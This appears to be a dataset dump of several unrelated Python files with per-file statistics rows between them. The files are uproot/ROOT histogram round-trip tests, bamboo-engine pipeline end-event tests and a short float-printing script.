    hist_in = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 8.0, 3)
    hist_in.Fill(2.0, 10.0, 9.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Sumw2 has (5+2)*(6+2)*(7+2) = 504 slots; with ROOT's global-bin
    # formula x + 7*(y + 8*z), the fills (x=1,y=2,z=2) and (x=1,y=3,z=2)
    # land at 127 and 134 with squared weights 9 and 16.
    expected_sumw2 = [0.0] * 504
    expected_sumw2[127] = 9.0
    expected_sumw2[134] = 16.0
    # 5*6*7 in-range bins scanned x-major below; fills are at flat 8 and 15.
    expected_bins = [0.0] * 210
    expected_bins[8] = 3.0
    expected_bins[15] = 4.0
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
    assert readback.GetNbinsZ() == 7
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5714285714285714
    assert readback.GetRMS() == 0.4948716593053938
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            for z in range(1, 8):
                assert readback.GetBinContent(x, y, z) == expected_bins[flat]
                flat += 1
def test_th3_uproot(tmp_path):
    """The uproot-written copy of a TH3F is classified as a TH3 by uproot."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 8.0, 3)
    hist_in.Fill(2.0, 10.0, 9.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert "TH3" in uproot.open(out_path)["test"]._classname.decode("utf-8")
def test_th3_varbin(tmp_path):
    """Variable-width binning on all three TH3F axes survives the round trip."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    xedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    yedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
    zedges = np.array([1.0, 10.0, 13.0, 14.0, 16.0, 20.0, 21.0, 23.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH3F("hvar", "title", 5, xedges, 6, yedges, 7, zedges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
    assert readback.GetNbinsZ() == 7
def test_compressed_th3(tmp_path):
    """Variable-width TH3F round trip through a ZLIB(1)-compressed file."""
    import numpy as np
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    xedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0], dtype="float64")
    yedges = np.array([1.0, 3.0, 4.0, 10.0, 11.0, 12.0, 20.0], dtype="float64")
    zedges = np.array([1.0, 10.0, 13.0, 14.0, 16.0, 20.0, 21.0, 23.0], dtype="float64")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH3F("hvar", "title", 5, xedges, 6, yedges, 7, zedges)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.ZLIB(1)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
    assert readback.GetNbinsZ() == 7
def test_tprofile(tmp_path):
    """Copy a ROOT-made TProfile through uproot's writer; verify it in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile("hvar", "title", 5, 1, 10)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 3)
    hist_in.Fill(2.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Bin 1 of Sumw2 holds 3^2 + 4^2 = 25; the profile mean there is 3.5.
    expected_sumw2 = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    expected_bins = [3.5, 0.0, 0.0, 0.0, 0.0]
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    for index, expected in enumerate(expected_bins, start=1):
        assert readback.GetBinContent(index) == expected
def test_tprofile_uproot(tmp_path):
    """The uproot-written copy keeps its exact TProfile classname."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile("hvar", "title", 5, 1, 10)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 3)
    hist_in.Fill(2.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert uproot.open(out_path)["test"]._classname == b"TProfile"
def test_compressed_tprofile(tmp_path):
    """TProfile round trip through an LZMA(5)-compressed file."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile("hvar", "title", 5, 1, 10)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 3)
    hist_in.Fill(2.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.LZMA(5)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    expected_sumw2 = [0.0, 25.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    expected_bins = [3.5, 0.0, 0.0, 0.0, 0.0]
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    for index, expected in enumerate(expected_bins, start=1):
        assert readback.GetBinContent(index) == expected
def test_tprofile2d(tmp_path):
    """Copy a ROOT-made TProfile2D through uproot's writer; verify in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3)
    hist_in.Fill(2.0, 10.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # (5+2)*(6+2) = 56 Sumw2 slots; fills at global bins 15 and 22 carry
    # squared profile values 3^2 = 9 and 4^2 = 16.
    expected_sumw2 = [0.0] * 56
    expected_sumw2[15] = 9.0
    expected_sumw2[22] = 16.0
    expected_bins = [0.0] * 30
    expected_bins[1] = 3.0
    expected_bins[2] = 4.0
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            assert readback.GetBinContent(x, y) == expected_bins[flat]
            flat += 1
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
def test_tprofile2d_uproot(tmp_path):
    """The uproot-written copy keeps its exact TProfile2D classname."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3)
    hist_in.Fill(2.0, 10.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert uproot.open(out_path)["test"]._classname == b"TProfile2D"
def test_compressed_tprofile2d(tmp_path):
    """TProfile2D round trip through an LZMA(5)-compressed file."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile2D("hvar", "title", 5, 1, 10, 6, 1, 20)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3)
    hist_in.Fill(2.0, 10.0, 4)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.LZMA(5)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Same expectations as the uncompressed TProfile2D test.
    expected_sumw2 = [0.0] * 56
    expected_sumw2[15] = 9.0
    expected_sumw2[22] = 16.0
    expected_bins = [0.0] * 30
    expected_bins[1] = 3.0
    expected_bins[2] = 4.0
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            assert readback.GetBinContent(x, y) == expected_bins[flat]
            flat += 1
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
def test_tprofile3d(tmp_path):
    """Copy a ROOT-made TProfile3D through uproot's writer; verify in ROOT."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 8)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3, 6)
    hist_in.Fill(2.0, 10.0, 4, 7)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Sumw2 has (5+2)*(6+2)*(8+2) = 560 slots; with ROOT's global-bin
    # formula x + 7*(y + 8*z) the fills (x=1,y=2,z=2) and (x=1,y=3,z=3)
    # land at 127 and 190 with squared profile values 36 and 49.
    expected_sumw2 = [0.0] * 560
    expected_sumw2[127] = 36.0
    expected_sumw2[190] = 49.0
    # 5*6*8 in-range bins scanned x-major below; fills are at flat 9 and 18.
    expected_bins = [0.0] * 240
    expected_bins[9] = 6.0
    expected_bins[18] = 7.0
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            for z in range(1, 9):
                assert readback.GetBinContent(x, y, z) == expected_bins[flat]
                flat += 1
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
    assert readback.GetNbinsZ() == 8
def test_tprofile3d_uproot(tmp_path):
    """The uproot-written copy keeps its exact TProfile3D classname."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 5)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3, 5)
    hist_in.Fill(2.0, 10.0, 4, 8)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    assert uproot.open(out_path)["test"]._classname == b"TProfile3D"
def test_compressed_tprofile3d(tmp_path):
    """TProfile3D round trip through an LZMA(6)-compressed file."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TProfile3D("hvar", "title", 5, 1, 10, 6, 1, 20, 8, 2, 8)
    hist_in.Sumw2()
    hist_in.Fill(1.0, 5.0, 3, 6)
    hist_in.Fill(2.0, 10.0, 4, 7)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=uproot.LZMA(6)) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    readback = rootfile.Get("test")
    # Same expectations as the uncompressed TProfile3D test: 560 Sumw2
    # slots with 6^2 = 36 and 7^2 = 49 at global bins 127 and 190.
    expected_sumw2 = [0.0] * 560
    expected_sumw2[127] = 36.0
    expected_sumw2[190] = 49.0
    expected_bins = [0.0] * 240
    expected_bins[9] = 6.0
    expected_bins[18] = 7.0
    flat = 0
    for x in range(1, 6):
        for y in range(1, 7):
            for z in range(1, 9):
                assert readback.GetBinContent(x, y, z) == expected_bins[flat]
                flat += 1
    assert list(readback.GetSumw2()) == expected_sumw2
    assert readback.GetMean() == 1.5
    assert readback.GetRMS() == 0.5
    assert readback.GetNbinsX() == 5
    assert readback.GetNbinsY() == 6
    assert readback.GetNbinsZ() == 8
def test_dir_allocation(tmp_path):
    """Writing 100 keys of growing size forces TDirectory reallocation."""
    out_path = join(str(tmp_path), "example.root")
    with uproot.recreate(out_path, compression=None) as out:
        for length in range(1, 101):
            out["a" * length] = "a" * length
    rootfile = ROOT.TFile.Open(out_path)
    assert str(rootfile.Get("a" * 100)) == "a" * 100
    rootfile.Close()
def test_taxis_axisbins(tmp_path):
    """The TAxis first/last visible-bin range survives the round trip."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, 1, 10)
    hist_in.Fill(1.0, 3)
    hist_in.Fill(3.0, 8)
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    axis = rootfile.Get("test").GetXaxis()
    assert axis.GetFirst() == 1
    assert axis.GetLast() == 5
def test_taxis_time(tmp_path):
    """The x-axis time-display flag must survive the uproot round trip."""
    filename = join(str(tmp_path), "example.root")
    testfile = join(str(tmp_path), "test.root")
    f = ROOT.TFile.Open(testfile, "RECREATE")
    h = ROOT.TH1F("hvar", "title", 5, 1, 10)
    h.GetXaxis().SetTimeDisplay(1)
    h.Write()
    f.Close()
    t = uproot.open(testfile)
    hist = t["hvar"]
    with uproot.recreate(filename, compression=None) as f:
        f["test"] = hist
    f = ROOT.TFile.Open(filename)
    h = f.Get("test")
    # Fix: `== True` (flake8 E712) replaced with a plain truthiness check.
    assert h.GetXaxis().GetTimeDisplay()
    # Fix: close the reopened file like the sibling tests do.
    f.Close()
def test_th1_binlabel1(tmp_path):
    """A single x-axis bin label survives the round trip (read via ROOT)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    hist_in = ROOT.TH1F("hvar", "title", 5, 1, 10)
    hist_in.Fill(1.0, 3)
    hist_in.GetXaxis().SetBinLabel(1, "Hi")
    hist_in.Write()
    src.Close()
    copied = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = copied
    rootfile = ROOT.TFile.Open(out_path)
    assert rootfile.Get("test").GetXaxis().GetBinLabel(1) == "Hi"
def test_th1_binlabel1_uproot(tmp_path):
    """A TH1 bin label set by ROOT survives an uproot re-write (checked via uproot internals)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH1F("hvar", "title", 5, 1, 10)
    histo.Fill(1.0, 3)
    histo.GetXaxis().SetBinLabel(1, "Hi")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
    # Re-read with uproot itself and inspect the raw label member.
    reread = uproot.open(out_path)
    rewritten = reread["test"]
    assert rewritten._fXaxis._fLabels[0] == b"Hi"
def test_th1_binlabel2(tmp_path):
    """Two TH1 bin labels survive an uproot re-write (checked via ROOT)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH1F("hvar", "title", 5, 1, 10)
    histo.Fill(1.0, 3)
    histo.Fill(2.0, 4)
    histo.GetXaxis().SetBinLabel(1, "Hi")
    histo.GetXaxis().SetBinLabel(2, "Hello")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
    result = ROOT.TFile.Open(out_path)
    rewritten = result.Get("test")
    assert rewritten.GetXaxis().GetBinLabel(1) == "Hi"
    assert rewritten.GetXaxis().GetBinLabel(2) == "Hello"
def test_th1_binlabel2_uproot(tmp_path):
    """Two TH1 bin labels survive an uproot re-write (checked via uproot internals)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH1F("hvar", "title", 5, 1, 10)
    histo.Fill(1.0, 3)
    histo.Fill(2.0, 4)
    histo.GetXaxis().SetBinLabel(1, "Hi")
    histo.GetXaxis().SetBinLabel(2, "Hello")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
    # Inspect both raw label members through uproot.
    reread = uproot.open(out_path)
    rewritten = reread["test"]
    assert rewritten._fXaxis._fLabels[0] == b"Hi"
    assert rewritten._fXaxis._fLabels[1] == b"Hello"
def test_th2_binlabel1(tmp_path):
    """TH2 x- and y-axis bin labels survive an uproot re-write."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH2F("hvar", "title", 5, 1, 10, 6, 1, 20)
    histo.Fill(1.0, 5.0, 3)
    histo.GetXaxis().SetBinLabel(1, "Hi1")
    histo.GetYaxis().SetBinLabel(2, "Hi2")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
    result = ROOT.TFile.Open(out_path)
    rewritten = result.Get("test")
    assert rewritten.GetXaxis().GetBinLabel(1) == "Hi1"
    assert rewritten.GetYaxis().GetBinLabel(2) == "Hi2"
def test_th3_binlabel1(tmp_path):
    """TH3 x-, y-, and z-axis bin labels survive an uproot re-write."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH3F("hvar", "title", 5, 1, 10, 6, 1, 20, 7, 1, 30)
    histo.Fill(1.0, 5.0, 8.0, 3)
    histo.GetXaxis().SetBinLabel(1, "Hi1")
    histo.GetYaxis().SetBinLabel(2, "Hi2")
    histo.GetZaxis().SetBinLabel(3, "Hi3")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
    result = ROOT.TFile.Open(out_path)
    rewritten = result.Get("test")
    assert rewritten.GetXaxis().GetBinLabel(1) == "Hi1"
    assert rewritten.GetYaxis().GetBinLabel(2) == "Hi2"
    assert rewritten.GetZaxis().GetBinLabel(3) == "Hi3"
def test_objany_multihist(tmp_path):
    """Writing the same labeled histogram under two keys preserves the label in both (ROOT check)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH1F("hvar", "title", 5, 1, 10)
    histo.Fill(1.0, 3)
    histo.GetXaxis().SetBinLabel(1, "Hi")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
        out["test1"] = loaded
    result = ROOT.TFile.Open(out_path)
    first = result.Get("test")
    second = result.Get("test1")
    assert first.GetXaxis().GetBinLabel(1) == "Hi"
    assert second.GetXaxis().GetBinLabel(1) == "Hi"
def test_objany_multihist_uproot(tmp_path):
    """Writing the same labeled histogram under two keys preserves the label in both (uproot check)."""
    out_path = join(str(tmp_path), "example.root")
    src_path = join(str(tmp_path), "test.root")
    src = ROOT.TFile.Open(src_path, "RECREATE")
    histo = ROOT.TH1F("hvar", "title", 5, 1, 10)
    histo.Fill(1.0, 3)
    histo.GetXaxis().SetBinLabel(1, "Hi")
    histo.Write()
    src.Close()
    loaded = uproot.open(src_path)["hvar"]
    with uproot.recreate(out_path, compression=None) as out:
        out["test"] = loaded
        out["test1"] = loaded
    # Re-read with uproot and inspect the raw label member on both copies.
    reread = uproot.open(out_path)
    first = reread["test"]
    second = reread["test1"]
    assert first._fXaxis._fLabels[0] == b"Hi"
    assert second._fXaxis._fLabels[0] == b"Hi"
| 43.816724
| 2,813
| 0.52345
| 9,012
| 38,252
| 2.199845
| 0.018531
| 0.518436
| 0.771299
| 1.021135
| 0.95319
| 0.951425
| 0.948398
| 0.945574
| 0.942194
| 0.939622
| 0
| 0.211544
| 0.222315
| 38,252
| 872
| 2,814
| 43.866972
| 0.454888
| 0.002693
| 0
| 0.881119
| 0
| 0
| 0.053268
| 0
| 0
| 0
| 0
| 0
| 0.163636
| 1
| 0.055944
| false
| 0
| 0.013986
| 0
| 0.06993
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
8c31643d686e5bdf185625e1f34410df5b56f46f
| 3,614
|
py
|
Python
|
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | 1
|
2022-01-06T15:44:43.000Z
|
2022-01-06T15:44:43.000Z
|
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | null | null | null |
runtime/bamboo-pipeline/test/eri_imp_test_use/tests/execution/test_executable_end_event.py
|
DomineCore/bamboo-engine
|
fb4583e70f9e1e87d9d48c2393db8d8104306f37
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from bamboo_engine.builder import * # noqa
from bamboo_engine.engine import Engine
from pipeline.eri.runtime import BambooDjangoRuntime
from ..utils import * # noqa
def test_executable_end_event_execution():
    """A pipeline ending in a working ExecutableEndEvent runs every node to completion."""
    start_event = EmptyStartEvent()
    activity = ServiceActivity(component_code="debug_node")
    end_event = ExecutableEndEvent(type="MyTestEndEvent")
    start_event.extend(activity).extend(end_event)

    tree = build_tree(start_event)
    Engine(BambooDjangoRuntime()).run_pipeline(pipeline=tree, root_pipeline_data={})
    sleep(1)

    expected_exec_data = {
        tree["id"]: {"inputs": {}, "outputs": {}},
        activity.id: {
            "inputs": {"_loop": 1, "_inner_loop": 1},
            "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True},
        },
    }
    assert_all_finish([tree["id"], start_event.id, activity.id, end_event.id])
    assert_exec_data_equal(expected_exec_data)
    assert_schedule_finish(activity.id, times=1)
def test_executable_end_event_raise():
    """An ExecutableEndEvent that raises leaves the end node failed and the pipeline running."""
    start_event = EmptyStartEvent()
    activity = ServiceActivity(component_code="debug_node")
    end_event = ExecutableEndEvent(type="MyRaiseEndEvent")
    start_event.extend(activity).extend(end_event)

    tree = build_tree(start_event)
    Engine(BambooDjangoRuntime()).run_pipeline(pipeline=tree, root_pipeline_data={})
    sleep(1)

    expected_exec_data = {
        activity.id: {
            "inputs": {"_loop": 1, "_inner_loop": 1},
            "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True},
        },
    }
    assert_all_finish([start_event.id, activity.id])
    assert_all_running([tree["id"]])
    assert_all_failed([end_event.id])
    assert_exec_data_equal(expected_exec_data)
    assert_schedule_finish(activity.id, times=1)
def test_executable_end_event_in_subprocess():
    """ExecutableEndEvents work both inside a subprocess and in the parent pipeline."""
    # Inner (subprocess) flow.
    inner_start = EmptyStartEvent()
    activity = ServiceActivity(component_code="debug_node")
    inner_end = ExecutableEndEvent(type="MyTestEndEvent")
    inner_start.extend(activity).extend(inner_end)

    # Outer flow wrapping the subprocess.
    outer_start = EmptyStartEvent()
    subprocess_node = SubProcess(start=inner_start)
    outer_end = ExecutableEndEvent(type="MyTestEndEvent")
    outer_start.extend(subprocess_node).extend(outer_end)

    tree = build_tree(outer_start)
    Engine(BambooDjangoRuntime()).run_pipeline(pipeline=tree, root_pipeline_data={})
    sleep(1)

    all_nodes = [
        tree["id"],
        outer_start.id,
        subprocess_node.id,
        outer_end.id,
        inner_start.id,
        activity.id,
        inner_end.id,
    ]
    expected_exec_data = {
        tree["id"]: {"inputs": {}, "outputs": {}},
        activity.id: {
            "inputs": {"_loop": 1, "_inner_loop": 1},
            "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True},
        },
    }
    assert_all_finish(all_nodes)
    assert_exec_data_equal(expected_exec_data)
    assert_schedule_finish(activity.id, times=1)
def test_executable_end_event_raise_in_subproc():
    """A raising ExecutableEndEvent inside a subprocess fails that node and keeps both pipelines running."""
    # Inner (subprocess) flow whose end event raises.
    inner_start = EmptyStartEvent()
    activity = ServiceActivity(component_code="debug_node")
    inner_end = ExecutableEndEvent(type="MyRaiseEndEvent")
    inner_start.extend(activity).extend(inner_end)

    # Outer flow wrapping the subprocess.
    outer_start = EmptyStartEvent()
    subprocess_node = SubProcess(start=inner_start)
    outer_end = ExecutableEndEvent(type="MyTestEndEvent")
    outer_start.extend(subprocess_node).extend(outer_end)

    tree = build_tree(outer_start)
    Engine(BambooDjangoRuntime()).run_pipeline(pipeline=tree, root_pipeline_data={})
    sleep(1)

    expected_exec_data = {
        activity.id: {
            "inputs": {"_loop": 1, "_inner_loop": 1},
            "outputs": {"_loop": 1, "_inner_loop": 1, "_result": True},
        },
    }
    assert_all_finish([outer_start.id, activity.id, inner_start.id])
    assert_all_running([tree["id"], subprocess_node.id])
    assert_all_failed([inner_end.id])
    assert_exec_data_equal(expected_exec_data)
    assert_schedule_finish(activity.id, times=1)
| 31.155172
| 119
| 0.692031
| 450
| 3,614
| 5.231111
| 0.14
| 0.033985
| 0.040782
| 0.047579
| 0.878505
| 0.860238
| 0.831351
| 0.831351
| 0.831351
| 0.831351
| 0
| 0.008278
| 0.164361
| 3,614
| 115
| 120
| 31.426087
| 0.771192
| 0.008578
| 0
| 0.7125
| 0
| 0
| 0.10394
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c5c1aac1b6217c39008049750fa203b809d4fbc
| 234
|
py
|
Python
|
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
# Demonstrate Python's float type: print each value and its type.
# Fix: the original repeated the same assign-and-print pair four times;
# a loop over the values removes the duplication and prints identical output.
values = [0.5, 1.5, 2.5, 3.5]
for f in values:
    print(f"Your number {f} is of type {type(f)}")
| 19.5
| 47
| 0.564103
| 52
| 234
| 2.538462
| 0.230769
| 0.181818
| 0.212121
| 0.333333
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0
| 0.042553
| 0.196581
| 234
| 12
| 48
| 19.5
| 0.659574
| 0
| 0
| 0.5
| 0
| 0
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
4fd76b0f2bc7303b9ccce7bea980d6cd45b8d376
| 138
|
py
|
Python
|
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
